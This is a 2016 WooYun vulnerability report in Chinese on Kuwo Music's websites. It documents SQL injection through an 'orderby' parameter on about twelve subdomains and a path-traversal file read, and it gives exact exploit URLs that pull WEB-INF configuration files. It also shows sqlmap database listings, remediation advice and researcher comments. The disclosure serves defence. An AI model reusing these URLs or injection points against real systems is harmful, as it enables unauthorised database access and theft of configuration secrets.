当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0221469

漏洞标题:酷我主站及十多个分站SQL注入+文件读取

相关厂商:酷我音乐

漏洞作者: pandas

提交时间:2016-06-21 16:06

修复时间:2016-06-27 09:39

公开时间:2016-06-27 09:39

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-06-21: 细节已通知厂商并且等待厂商处理中
2016-06-21: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

酷我主站及10+个分站SQL注入+文件读取,打个包。

详细说明:

漏洞站点统计:

http://yule.kuwo.cn/
http://kappa.kuwo.cn/
http://huodong.kuwo.cn/
http://album.kuwo.cn/
http://playlist.kuwo.cn/
http://play.kuwo.cn/
http://changba.kuwo.cn/
http://www.kuwo.cn/
http://tupian.kuwo.cn/
http://hbtv.kuwo.cn/
http://gxtv.kuwo.cn/
http://yinyue.kuwo.cn/


目前搜集到以上连主站共12个站点受影响,可能还有遗漏。
一.SQL注入:
http://www.kuwo.cn/huodong/wanmei/xianglong/getAllWork?orderby=flowers&huodongName=wanmeixianglong&curpager=1
漏洞参数:orderby
SQLMAP可跑数据:

QQ20160621-0@2x.png


涉及21个数据库:

available databases [21]:
[*] ACT
[*] BELL
[*] Cafe
[*] CONCERT
[*] CROWD_FUNDING
[*] information_schema
[*] KGE
[*] KGE_ACT
[*] KGECOMMENT
[*] KW_TV
[*] LISTEN_STORY
[*] MANYOU
[*] mysql
[*] NEWS
[*] performance_schema
[*] RESWIKI
[*] SPEAKER
[*] statistics
[*] TAOBAO
[*] test
[*] YAHOO


其余的站点都可以用sqlmap跑数据,漏洞点相同,附一张SQLMAP证明:

QQ20160621-1@2x.png


漏洞证明:

二、文件读取
这是一个历史问题,之前也有白帽子提交过,但厂商一直修复不好。
主站:
http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/web.xml?&pn=0&subid=142

QQ20160621-2@2x.png


http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/classes/config.properties?&pn=0&subid=142

QQ20160621-3@2x.png


http://www.kuwo.cn/huodong/st/ActCommentsNewFromDB?dis=/WEB-INF/classes/log4j.properties?&pn=0&subid=142

QQ20160621-4@2x.png


同理:其他的分站点也存在该处文件读取漏洞,厂商还是抓紧修复下。

修复方案:

1. SQL注入:orderby参数严格过滤;
2. 文件读取:结合该功能点,判断是否跨越目录读取文件。或者用笨方法,判断好 ../ 、 WEB-INF 、 jsp$(jsp结尾)等文件不可读即可。

版权声明:转载请注明来源 pandas@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-27 09:39

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2016-06-21 16:15 | 方大核桃 ( 普通白帽子 | Rank:195 漏洞数:59 | 要怎么长大,才能赢过时间啊)

    昨天扫描器刚扫过...一无所获...尴尬...

  2. 2016-06-21 16:21 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

    @方大核桃 尴尬

  3. 2016-06-21 16:25 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

    @方大核桃 众人拾柴火焰高

  4. 2016-06-21 16:33 | F4K3R ( 普通白帽子 | Rank:318 漏洞数:34 | 求团队收留。)

    @方大核桃 尴尬

  5. 2016-06-21 16:35 | D&G ( 普通白帽子 | Rank:780 漏洞数:158 | going)

    刚扫过的路过~好尴尬

  6. 2016-06-21 16:36 | pandas ( 普通白帽子 | Rank:735 漏洞数:85 | 国家特级保护动物)

    你们都好厉害啊,都有扫描器。

  7. 2016-06-21 16:53 | null_z ( 普通白帽子 | Rank:1012 漏洞数:115 )

    @方大核桃 sqlmapapi??

  8. 2016-06-21 20:00 | 方大核桃 ( 普通白帽子 | Rank:195 漏洞数:59 | 要怎么长大,才能赢过时间啊)

    @null_z 自己写的url采集规则 检测使用的sqlmap

  9. 2016-06-21 23:55 | bigric3 ( 普通白帽子 | Rank:105 漏洞数:6 | http://0day.websaas.com.cn/)

    想知道我天哥在哪找的点

  10. 2016-06-27 09:51 | 奶嘴 ( 普通白帽子 | Rank:419 漏洞数:110 | 17岁的毛孩有些厂商故意加你好友,和你聊...)

    洞主你是酷我杀手